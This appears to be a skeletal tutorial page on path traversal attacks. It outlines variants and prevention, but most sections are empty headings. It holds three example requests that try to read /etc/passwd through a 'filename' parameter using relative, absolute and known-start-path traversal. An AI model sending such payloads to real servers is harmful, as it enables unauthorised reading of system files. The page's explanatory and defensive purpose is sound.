Path Traversal
Overview
Common Attack Variants
1. Relative Path Traversal
GET /loadImage?filename=../../../etc/passwd2. Absolute Path Traversal
GET /loadImage?filename=/etc/passwd3. Traversal from a Known Start Path
GET /loadImage?filename=/var/www/images/../../../etc/passwd4. Traversal with Escaped Paths
5. Traversal Using URL Encoding
6. Null Byte Injection
Prevention Techniques
Summary Examples
Technique
Example URL
Last updated